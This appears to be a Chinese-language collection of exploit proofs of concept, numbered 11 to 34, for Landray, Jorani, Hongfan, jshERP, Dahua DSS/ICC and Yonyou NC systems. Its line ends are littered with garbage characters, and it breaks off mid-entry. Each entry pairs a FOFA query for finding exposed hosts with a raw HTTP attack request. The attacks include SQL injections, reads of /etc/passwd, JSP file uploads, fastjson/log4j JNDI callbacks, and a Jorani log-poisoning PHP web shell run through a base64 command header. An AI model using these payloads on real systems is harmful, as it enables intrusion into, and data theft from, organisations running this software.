------WebKitFormBoundaryxdgaqmqu--( U& p: R7 \0 T/ Z* [

  M3 B7 B3 z/ N1 C7 e! x  {$ e' v6 {. y1 P1 R8 Z0 N2 \4 x
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入3 w3 r; @- l  C. W: v
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
! M, e8 ?* Z! z1 Y' w9 BGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.12 k6 ^- z2 K5 Z/ P% T9 n
Host: 127.0.0.1
& K% `1 I0 ?: R( f2 B- |# gPragma: no-cache6 X( n0 d, t2 l8 V0 D: |! u
Cache-Control: no-cache# y, a+ Q) d/ L$ E
Upgrade-Insecure-Requests: 1
' F/ k5 ?+ q* o: I( MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" ?  V- d; r" u/ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 M5 H8 ~" J# j/ B5 Q
Accept-Encoding: gzip, deflate
! x" k1 x8 U- K- m6 R2 k& eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 |6 ~8 f2 v$ D7 x: E3 n- cConnection: close
) \* B/ J7 g9 k- ~: B* i$ t, G
% q; R6 O9 O- O9 i7 ^
$ A/ Z- s2 j9 V8 ^12. Jorani < 1.0.2 远程命令执行
7 j, [/ |- Z" V) p4 ^& f! K8 sFOFA:title="Jorani"1 t, r# E6 G7 R  }2 P
第一步先拿到cookie% s  \: h+ L1 R* A! }9 `
GET /session/login HTTP/1.1- r+ N8 _- N- F0 l* A
Host: 192.168.190.30
6 D  K! I- g+ q& f! j$ mUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36* _7 t0 ?- P( E$ A* o
Connection: close
# S4 }% e4 @7 F0 b$ ^" L+ e, oAccept-Encoding: gzip6 v7 N9 N* E! @* K9 G; O

1 F1 }4 Y$ ?) Q& e
6 z! U6 _6 M; {  ]- e. }' }1 B响应中csrf_cookie_jorani用于后续请求* M+ \& [9 u8 h  p5 ]0 n6 b
HTTP/1.1 200 OK, k+ p8 o9 h% E4 c
Connection: close7 B/ }6 G! Z- g& q2 J5 v! U  `
Cache-Control: no-store, no-cache, must-revalidate! H2 {, M7 V; F5 B. `: U  m
Content-Type: text/html; charset=UTF-8
3 k/ a% L- T" n* GDate: Tue, 24 Oct 2023 09:34:28 GMT! x% `7 u2 I& U7 {+ Y. T
Expires: Thu, 19 Nov 1981 08:52:00 GMT
% L2 \5 N) t2 p+ h8 DLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
) f- K! L3 l: h- E; G1 t2 zPragma: no-cache  I! A7 `0 t9 ~$ C. b& i2 [( a# B
Server: Apache/2.4.54 (Debian)
( d% v0 ?9 f& e$ q4 {9 cSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
: s+ N" @% E$ aSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
5 h6 _% L2 @/ \1 A" q8 A% m: sVary: Accept-Encoding3 w/ ~& G6 G0 U5 W
0 {5 t0 d  ~& Q1 k
, N7 |9 U! G8 ?+ A" K# z- t
POST请求,执行函数并进行base64编码& a5 ?6 f& ?4 }$ L$ y" }% r
POST /session/login HTTP/1.1
5 y1 |+ i. D- R1 N5 RHost: 192.168.190.30
# I6 Z9 h+ D) |5 b9 A. F8 O4 M/ F# U6 V. \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& Q8 q9 L* t+ h! _6 K; y
Connection: close
  u) t5 D4 t. L4 Q8 fContent-Length: 252
% J! Z% U; l6 {2 p2 c) LContent-Type: application/x-www-form-urlencoded
  H. w0 ^, B2 a3 K& a8 BCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r$ H, X( _- I% J8 u+ z0 [0 c
Accept-Encoding: gzip) M. O/ T4 o2 x# B2 n

: V& J$ S, L+ bcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
( M; j6 f8 |( @& R$ M
5 m* Z; D- n, ]8 o$ b# O5 h9 n- P' c4 T5 E) i1 e
4 ?$ B1 u0 B9 A5 p& D( Q- E
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串! x% {  V4 @" H* |8 C
GET /pages/view/log-2023-10-24 HTTP/1.19 r: t( h1 m+ C% n: _! j/ M
Host: 192.168.190.30
% J  j8 P: L1 z# P5 B; H5 f- bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 r% d+ x0 l7 H: {. n5 N6 ]
Connection: close
6 H0 }. `( C. f- w9 f, ?Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 t1 x# q; {3 }
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
7 B, l/ C0 a4 E- V$ ^0 `9 R9 eX-REQUESTED-WITH: XMLHttpRequest
' l  f0 S* e3 v7 ]/ mAccept-Encoding: gzip
# m! \! E7 P3 U9 s6 Y8 ?+ K1 h( n+ L% O7 `1 i' x  M8 b; O* |
, b, ?# X' @( m
13. 红帆iOffice ioFileDown任意文件读取
2 s7 X1 w" g8 U( TFOFA:app="红帆-ioffice"3 ~  f( ^- N4 K9 q
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
1 p+ V: b; l# ^! o& Q' O" }" A) p% K! zHost: x.x.x.x
0 W) e) F. S( V* B( hUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% t! t6 e! `0 z% b% I/ U2 HConnection: close
1 r% L" r  w) B! YAccept: */*2 J0 ?5 C6 V4 t2 P7 d& V
Accept-Encoding: gzip: R( m' ]/ g1 B! e& c2 C. k
: c  U2 s# Y' F& k; t9 C/ p

+ u/ N2 I% W3 v+ q7 r# {2 n14. 华夏ERP(jshERP)敏感信息泄露
" d8 q4 k2 l9 v  ^: h' F3 S0 TFOFA:body="jshERP-boot"
) Z' S$ C2 X" ]) a) j2 [  {4 B2 c泄露内容包括用户名密码. _9 r4 k! C4 N% m* E+ k: w
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
4 r3 L7 ~+ T7 p9 `  H3 |Host: x.x.x.x4 P! O2 f. ]+ ]+ s4 A( Z9 x- h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
& g% @, {6 k  \Connection: close
7 j# U' C# m) U: E  r/ LAccept: */*7 i5 ]" O+ s/ k# L+ }7 i, c
Accept-Language: en" {8 `0 c# `  F" t
Accept-Encoding: gzip- Z& Z+ t) R! i8 [' N! s' W. d

! R- I6 o# \7 v2 B
' j! Q7 @/ ~- t- S2 o. e15. 华夏ERP getAllList信息泄露
1 w% L; S$ c3 c% S# `+ k6 Z' lCVE-2024-04900 t, {' p$ ?9 h4 _8 o  r
FOFA:body="jshERP-boot"9 Y  N1 i3 b0 m- P
泄露内容包括用户名密码
& H9 n6 N0 X4 c4 ~' @9 zGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
) B- S& Q- P5 b: A' O' Q" H0 EHost: 192.168.40.130:1000 b$ \6 c. Y! b7 P, m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- U$ @9 p9 j$ `Connection: close0 m* N  [9 a( ]3 j4 w1 _
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
' [- L; F5 _7 y; A" b) a. [" o! ]0 g. S' kAccept-Language: en) G8 y- D! o+ ^% W3 {
sec-ch-ua-platform: Windows! @" a# Y5 |, `5 L  w  i9 J
Accept-Encoding: gzip: ^2 }) b: ~& p6 U+ m
9 q1 {: @! T' a3 g2 e0 n
0 ~. d! Z  b5 @% h( _# M
16.  红帆HFOffice医微云SQL注入
# [& x! Z; F" ?6 H1 A- ~FOFA:title="HFOffice"
# o8 B) @, k8 A* u( ]& fpoc中调用函数计算1234的md5值$ g7 j' `, _/ j" N
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.14 \0 W: ^2 C/ x
Host: x.x.x.x
5 L8 e7 F4 G1 OUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 i! a/ a" P! {! OConnection: close; B; D1 m6 {5 {+ y; ~
Accept: */*3 R/ I* t( z5 m. x8 C
Accept-Language: en
* G8 H- i- j3 }, v  K9 c% n* JAccept-Encoding: gzip
- o' Y. i0 J, l/ [, Y9 {, I1 s7 ^7 {
8 K$ t( F; {3 I3 O" j+ P0 P. |
17. 大华 DSS itcBulletin SQL 注入
0 s( y4 J4 v" g, R! SFOFA:app="dahua-DSS"$ ?+ }6 o, ~( G2 k9 o7 @' i: F* P6 L
POST /portal/services/itcBulletin?wsdl HTTP/1.1
& \! c. N" J; `) F( }$ Y% EHost: x.x.x.x# G: K; u$ E( y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 _: e# F" t, S$ h, P8 S! J. dConnection: close6 g) {0 w" o- a6 ^' y) J
Content-Length: 345) f1 L# q9 ]( ~8 Q  R
Accept-Encoding: gzip, {( p  Z# O* b# V$ b) p' f

, p3 [7 y2 w! j<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>& o7 |9 t! M. O: i' }
<s11:Body>
" K# x, ~" p4 N    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>$ s- t- Y7 J$ K) ?
      <netMarkings>
& z/ ^9 s. b8 b/ [1 y7 m       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
" Q: @5 @) D7 H/ d, e0 q4 ^% ?( L      </netMarkings>
. W$ M" t% l; C9 J1 j    </ns1:deleteBulletin>+ s& K, F! R2 m) g: ?7 \* X9 A) W! s# a
  </s11:Body>. n! I" B! n* _
</s11:Envelope>
- e. j) R% p0 j) J: \9 U$ W& j4 K1 s5 E9 n3 B1 p; b2 Z2 s* r

$ I& B! [2 P, t( M# N18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
+ T4 s5 b/ F4 w; MFOFA:app="dahua-DSS"9 S4 v& i* d& _: Q+ e3 S4 s
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* w* e- j/ v& `. z2 eHost: your-ip
2 V  G* E8 W4 ^- `% d0 l8 ?+ |, XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% h  \  ?& n# k* H
Accept-Encoding: gzip, deflate1 J( r) p2 G+ r1 I& u% D8 \
Accept: */*1 O. Y5 N+ s- F
Connection: keep-alive
7 G% _  N$ S+ ^
7 k9 C# u* z9 `0 ~# E) n: ^5 o, z6 o" }/ U  q! v* @

. M$ k, I6 j( |" c4 {+ p9 c19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
+ R" Q5 H( M" K0 Y/ ~0 F: \FOFA:app="dahua-DSS"
& v( d2 u5 h+ s9 i+ a- u3 OGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1, c) Z/ y& C6 w: b" ?% e5 O$ z
Host:
1 _1 K# @) g. R- A0 T+ wUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
: B; P% ~# ^& v* BAccept-Encoding: gzip, deflate
# ?& j6 Z- }0 z- z+ R  |6 UAccept: */*
5 V: v4 R) Q/ F+ T- LConnection: keep-alive, W6 C8 M  b& k" ~
8 J! A" x. V7 ]8 c
" d. m$ a/ g3 Z$ k; V4 I
20. 大华ICC智能物联综合管理平台任意文件读取+ Y5 p# h/ d4 q! n( u/ Q0 V5 e$ d6 b/ ]
FOFA:body="*客户端会小于800*"
- j$ N" r9 |$ @$ wGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
8 i: ^7 S4 u$ J6 MHost: x.x.x.x$ D$ Z+ Q# i4 G3 B
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# D  ?7 K" O% ^
Connection: close
3 J: F+ e. B* p& _Accept: */*
) u3 W9 }0 v- {Accept-Language: en1 l1 E( H8 N3 p. O5 w9 M
Accept-Encoding: gzip: o% E# s7 f" g. e' F9 I6 ~" i
: k" F; E; C3 t6 [) u0 F7 d9 m. m

% D+ q; j9 ^' q( k  N7 p4 [8 ^21. 大华ICC智能物联综合管理平台random远程代码执行
8 s# Y6 T& D6 D4 B6 ^$ B7 O, TFOFA:icon_hash="-1935899595"1 I% u  m# d) x; @4 y+ |
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
7 \& u# B9 C4 }+ ?Host: x.x.x.x$ v$ q. ?. j8 H, p$ k; m0 i" `$ M2 z8 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 Z# m, Y' D, G, O; u# ~Content-Length: 161
$ Z" |* f4 D, U* q. ], n- OAccept-Encoding: gzip; o* S+ O: R; M3 Z( t
Connection: close
- x4 m2 x7 i, K6 U! YContent-Type: application/json;charset=utf-8
0 |$ y* H0 K8 N% T( D
8 Z5 X7 r6 @0 Q& g) Y{
6 u1 T, Q0 P9 W: Q+ }"a":{/ U  |) ?6 I* O6 K
   "@type":"com.alibaba.fastjson.JSONObject",
9 h3 ^8 L+ Z, g' Z    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
4 f1 G- H! ^& m* \3 R  }""
# j* {$ |* }- `$ m}% R$ Q- a% u3 Y! J; _
3 ~, A+ P+ z5 Z9 `6 m0 y+ c% `

! ^; V& N1 w0 q5 G! Z0 e22. 大华ICC智能物联综合管理平台 log4j远程代码执行
3 h! i+ n3 e, dFOFA:icon_hash="-1935899595"
- L1 a+ K, O  g3 x6 ^0 S. ePOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
0 ?0 ~8 Y' a% DHost: your-ip
( V0 F7 F6 k+ N' bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ `# X- V, N+ B3 i- k. xContent-Type: application/json;charset=utf-89 w  r2 Z. l; S
6 h. S0 @  i: P8 ^& x" `& }
{0 W- _4 l4 y& z' c
"loginName":"${jndi:ldap://dnslog}"
% ^" b8 h' s+ J  |4 H}
) ^! s9 T2 b$ A/ A
9 L$ X1 X+ Q/ B% Y, K  J7 e/ l
: c& _5 q; a( ~$ P; M
. }( c4 \& r- f& y: H6 g2 o23. 大华ICC智能物联综合管理平台 fastjson远程代码执行3 N. |' R0 l4 a5 p+ ^
FOFA:icon_hash="-1935899595"# Y" d6 y" u; |6 _( `
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
- L7 E- c; b1 x4 F- t( f$ yHost: your-ip
+ S! ]  {4 a4 H& wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 n, f- w# t' K/ ]/ q/ h4 K: N8 O3 n
Content-Type: application/json;charset=utf-8" |/ f2 g5 |" h& ]! t. W6 ^3 q4 O
Accept-Encoding: gzip0 ~8 ]# k4 r( Q/ R1 T
Connection: close  |8 X* p. U" K3 |8 y' A

% w& {: K4 d% S* Z: \{+ X$ ~9 i1 h8 k, z. ]" T9 T
    "a":{2 i, J) y. o2 D3 \1 C1 t
        "@type":"com.alibaba.fastjson.JSONObject",
; @' h/ J. F* P5 f: T       {"@type":"java.net.URL","val":"http://DNSLOG"}
7 _9 [' _1 m1 P8 \/ t/ ~        }""# o( I# a# V! o* m8 S. Z
}' ?# m& L" b" c) d
' A6 f& I$ }- `3 C
6 h7 U% o: V7 Y7 F- }: ^1 F
24. 用友NC 6.5 accept.jsp任意文件上传: k, F0 P$ @4 X
FOFA:icon_hash="1085941792"( u3 M% c3 [7 a1 k# |
POST /aim/equipmap/accept.jsp HTTP/1.1
# G  l  [1 b" i3 u. U2 V+ oHost: x.x.x.x
( K8 B  u4 A& V6 h3 A) MUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36% s7 H7 |+ k+ N4 T" k: ~2 q1 J
Connection: close
7 ^9 w' ^1 _8 i) Z/ c2 _" VContent-Length: 4495 z; N1 W* V' T. P% J0 K! q) k( d
Accept: */*
. I+ z, S; \' fAccept-Encoding: gzip* ?7 w/ F- o& Q. y9 s: ^3 _% B: S
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
) |7 w5 d+ R( }# r
* |! O0 P1 R+ `  V0 ]' I5 ~-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
2 S9 |! P. b( T: P9 n0 w3 [Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"3 D5 `- B& K, i6 O0 t9 F
Content-Type: text/plain
3 u  |7 X& h. |5 t
4 g4 [& d2 }, p- r* P<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
! g! Q4 s! T( H4 B8 m-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, M# W' j, q" T9 {# X
Content-Disposition: form-data; name="fname"' R: ^6 K4 c7 ?- y

4 v, F& T& n* C  o8 X\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
5 e" W+ w: ?$ m+ Z# t-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
9 E# s% p# A" H; [$ M$ x0 h/ }
+ C# }5 o3 i# o) f9 l7 V8 c4 D0 Y5 z8 E. a9 j
25. 用友NC registerServlet JNDI 远程代码执行6 G$ s" O% C; T. C4 Q4 E7 b, |
FOFA:app="用友-UFIDA-NC"5 B. _7 ^+ a8 \- K8 q9 Y
POST /portal/registerServlet HTTP/1.16 B7 c( A' s, o) d# f
Host: your-ip& J. ]0 h8 `9 M/ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" k5 t1 ~0 \: r) X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
- p4 x' X8 E4 t( \* o& `: ]5 HAccept-Encoding: gzip, deflate
; V7 P* g- `2 f# Z$ FAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
' @# ~/ A0 ^2 k8 R0 ZContent-Type: application/x-www-form-urlencoded, T- A( H9 Q6 ~' K
4 S% k- U' H0 R# j( G( l
type=1&dsname=ldap://dnslog( i& }" Z: y7 V# \+ t% r

! |) Q" C9 g; g1 ~9 X+ U: K+ w, h( W2 O* [. c' j' r* G; k- t

2 `' |+ n/ r% j/ }3 S! C+ L9 a26. 用友NC linkVoucher SQL注入
+ {9 @1 F; |( J: R% Y3 r+ ZFOFA:app="用友-UFIDA-NC"# S' U2 k( T" e0 F( A% B) R
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.16 p& K" {5 |2 L3 X6 C! B) ^- e; q
Host: your-ip; t* ^/ D& e$ q4 K& c9 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) Y6 X; L3 y2 G; mContent-Type: application/x-www-form-urlencoded
1 g+ o0 b/ V* _8 B& _% O; @5 c- g& ?Accept-Encoding: gzip, deflate
$ l( o- H( `$ q5 T$ R' GAccept: */*" N  \* T$ d# [9 ~
Connection: keep-alive
6 a6 w: K' v5 e- t4 Y5 I' _% ]
7 D7 G2 w# m8 x: ^9 s( ~
$ j2 v$ [$ Q( ?/ E0 v8 y27. 用友 NC showcontent SQL注入! {8 {' o4 t4 ]3 S4 W* L- K. {3 l
FOFA:icon_hash="1085941792"
+ K0 b: z. q& t$ D# B" sGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1! b6 Y; Y$ ?  e- P6 e& P% N- w
Host: your-ip- N# M  T# `4 _+ S0 M! Q) B) i( l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- _$ r, b# S+ e- W1 L& Y
Accept-Encoding: identity- d% r+ E* V) R+ T+ f
Connection: close
& B3 Z* E. H7 W# ?& Z, c" CContent-Type: text/xml; charset=utf-8' Y- q( q3 O( q; f, Z8 s

5 B! d0 B2 K5 ]$ l8 R8 P" `; B/ r4 u. `, K# V  z- M) d1 h
28. 用友NC grouptemplet 任意文件上传
  f# ^$ Y/ D) a+ AFOFA:icon_hash="1085941792"1 g' s* q& W  R
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1  b" Z( m6 b6 v! G8 p, t
Host: x.x.x.x1 Q4 i0 W5 l- G. T4 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36! T* M4 [6 K* t, j; V( e
Connection: close
0 ~0 m: ^8 [5 ]% l3 N, IContent-Length: 2689 K- F# V4 |- @7 ]: b
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
$ V. H% ~* U: S/ N9 w; UAccept-Encoding: gzip5 r- B8 ~2 Z; ^  y3 A+ G0 g
& z4 T0 F. X9 S
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk- r3 B+ z. B$ q  E8 T
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
* G( t0 p+ p  k% w' }+ H9 qContent-Type: application/octet-stream
1 _; e+ g: B9 D( n; s5 J3 q) w" z
0 e: u) R7 t' ^: }3 [7 T<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
9 M' c! m; m6 ]------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--& E) a1 e# g" D  S: m" N3 P
1 C& Z; U+ M+ r. r

* |+ k) n9 O) c/uapim/static/pages/nc/head.jsp- s0 h$ P( d1 }9 C. l1 z$ k2 M
  w8 C) [# s/ z- m* f
29. 用友NC down/bill SQL注入% L% P* n% o! N" n0 ]4 U' J
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"0 h% i5 {. g6 u/ S
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
) S" G' a$ B; n3 a; u# x" EHost: your-ip4 {- ]3 ~4 t0 f0 G; _1 U0 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 p# g- I" j* I  h! }( V( cContent-Type: application/x-www-form-urlencoded
$ ?$ G# A% ?& C) Y" T$ UAccept-Encoding: gzip, deflate
! T7 l* H# b! _" R2 OAccept: */*
2 |: f- L: r1 f8 b4 o7 a. EConnection: keep-alive
" Z' w. N  F: ?7 `
, j1 R1 ]4 X( i/ f5 c* Z, N6 J) J! T  n% X
30. 用友NC importPml SQL注入: j  a8 m7 G9 a; P
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"+ T+ _& ^: ^  j; O# x4 V# m
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.14 R! w$ r" Z- W& ~. ?: N
Host: your-ip# o' O% y0 P. R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V8 Z3 f3 Z8 k( ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 J! J4 c+ d- T3 y7 Z# KConnection: close
) u1 X  L  {- \/ x, t! \6 v& {( A
------WebKitFormBoundaryH970hbttBhoCyj9V
7 h' ~  @2 U( i4 PContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
' E. {# f1 C1 q: F  _6 zContent-Type: image/jpeg
# l. y$ W+ |1 o: v------WebKitFormBoundaryH970hbttBhoCyj9V--
$ j" _+ S' \. V, t4 @4 ]0 A: e, [8 `9 F2 \% i0 k

% H2 u) b) P' L31. 用友NC runStateServlet SQL注入
$ I) S$ U- {5 P' i) l, Y' U/ Jversion<=6.5/ w- r5 H" o9 u9 n% I
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
/ {/ h  u2 k: d8 U& t) QGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% J& H4 G2 ]2 D3 E' A- QHost: host. j  B0 f& w0 l! x% e  H0 u: Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- S& N/ U, T" ^, z
Content-Type: application/x-www-form-urlencoded) r3 [3 O6 Q3 z- E
1 ~! D+ l. @3 G8 ?# O

1 H1 ^1 V# a' X% w! p9 D/ f32. 用友NC complainbilldetail SQL注入- f5 w( Y* o$ \% l) E) h
version= NC633、NC65' E7 [- y! ]4 W, D( O2 K5 X$ W; l* {
FOFA:app="用友-UFIDA-NC"5 `5 R6 x: M# a7 O: h& E
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 l3 C7 B1 e/ z& PHost: your-ip
; R2 n8 P9 E* ^2 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# a1 g$ p1 F* ~3 f5 F0 ^
Content-Type: application/x-www-form-urlencoded
; ~6 j2 x* r. |0 T4 K7 f% rAccept-Encoding: gzip, deflate
) V. h' R: G5 Q" n5 d5 t4 F5 ^Accept: */*
) s5 e1 j* j$ W3 iConnection: keep-alive
" X- [: {8 e6 u* P  S. T  P
& p: W2 [! n& n6 {( a! T% A' X0 {2 f2 w
33. 用友NC downTax/download SQL注入
1 n/ _3 D# k) v9 i% s/ d4 P8 G' R9 Mversion:NC6.5FOFA:app="用友-UFIDA-NC"  Z3 A# K/ h; d7 q
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.15 m3 B8 `" X- \6 m4 f* l+ k
Host: your-ip1 Y9 q8 o2 [+ u' L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 x; l; J- ~% x( ]) \( |! H
Content-Type: application/x-www-form-urlencoded
# h% f, _' S! R9 x6 }Accept-Encoding: gzip, deflate$ [5 o$ ]3 U: Q2 w, s1 t
Accept: */*/ X1 ~& }4 A! U7 F2 r
Connection: keep-alive5 `. \; H) W3 n; `8 X
  N( ~  F3 V) u- Z

+ Z, Y9 D8 I2 J* Y9 \7 [34. 用友NC warningDetailInfo接口SQL注入
  i; A) ^$ L2 r9 P: [+ v0 HFOFA:app="用友-UFIDA-NC"5 l* |& }; `7 w  h) [
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ G* [# X2 O7 d* A& k( a$ O8 M, R
Host: your-ip& F: h. `4 e: ]" N
